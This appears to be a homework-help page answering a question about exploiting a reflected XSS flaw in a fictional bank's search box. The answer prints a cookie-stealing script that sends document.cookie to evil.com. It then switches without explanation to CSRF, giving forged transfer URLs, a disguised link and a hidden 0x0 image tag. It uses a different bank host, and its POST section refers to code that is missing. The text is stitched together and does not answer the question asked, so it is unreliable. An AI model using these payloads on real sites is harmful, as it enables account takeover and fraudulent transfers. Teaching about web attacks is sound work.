
Question

XSS Attacks:

Alice does Internet banking at XYZBank (http://www.xyzbank.com) and has a username and password there. XYZBank uses standard cookies for sessions. Unfortunately, there is a search box on the XYZBank website that yields an XSS vulnerability. Specifically, when a user enters a search term such as "location", she is taken to http://www.xyzbank.com/search.php?query=location and the search.php file contains the code: <?php echo $_GET['query'] ?> In other words, the search query is immediately echoed to the screen without any filtering. Alice's evil friend Bob wants to get access to her online banking account.

Explain how Bob might exploit this XSS vulnerability to do so. You should describe each step involved.

Explanation / Answer

Cross-site Scripting (XSS) Attack:

Cross-site Scripting (XSS) refers to a client-side code injection attack wherein an attacker can execute malicious scripts (also commonly referred to as a malicious payload) in a legitimate website or web application. XSS is amongst the most rampant of web application vulnerabilities and occurs when a web application makes use of unvalidated or unencoded user input within the output it generates.

An XSS attack needs three actors — the website, the victim and the attacker.

Here the website is the XYZBank website, the victim is Alice, and the attacker is Bob.

Now Bob's (the attacker's) goal is to impersonate Alice (the victim) by stealing Alice's cookie. Sending the cookie to a server Bob controls can be achieved in a variety of ways, one of which is for Bob to execute the following JavaScript code in Alice's browser through an XSS vulnerability.

<script>
   window.location="http://evil.com/?cookie=" + document.cookie
</script>

Steps Involved in this attack are:

How does the attack work?

There are numerous ways in which an end user can be tricked into loading information from or submitting information to a web application. In order to execute an attack, we must first understand how to generate a valid malicious request for our victim to execute. Let us consider the following example: Alice wishes to transfer $100 to Maria using the XYZBank web application that is vulnerable to CSRF. Bob, an attacker, wants to trick Alice into sending the money to him instead. The attack will comprise the following steps:

GET scenario

If the application was designed to primarily use GET requests to transfer parameters and execute actions, the money transfer operation might be reduced to a request like:

GET http://bank.com/transfer.do?acct=MARIA&amount=100 HTTP/1.1

Bob now decides to exploit this web application vulnerability using Alice as his victim. Bob first constructs the following exploit URL, which will transfer $100,000 from Alice's account to his account. He takes the original command URL and replaces the beneficiary name with himself, raising the transfer amount significantly at the same time:

http://bank.com/transfer.do?acct=BOB&amount=100000

The social engineering aspect of the attack tricks Alice into loading this URL when she's logged into the bank application. This is usually done with one of the following techniques:

The exploit URL can be disguised as an ordinary link, encouraging the victim to click it:

<a href="http://bank.com/transfer.do?acct=BOB&amp;amount=100000">View my Pictures!</a>

Or as a 0x0 fake image:

<img src="http://bank.com/transfer.do?acct=BOB&amp;amount=100000" width="0" height="0" border="0">

If this image tag were included in the email, Alice wouldn't see anything. However, the browser will still submit the request to the XYZBank website without any visual indication that the transfer has taken place.

POST scenario

The only difference between GET and POST attacks is how the attack is being executed by the victim. Let's assume the bank now uses POST and the vulnerable request looks like this:

Such a request cannot be delivered using standard A or IMG tags, but can be delivered using a FORM tag:

This form will require the user to click on the submit button, but this can be also executed automatically using JavaScript: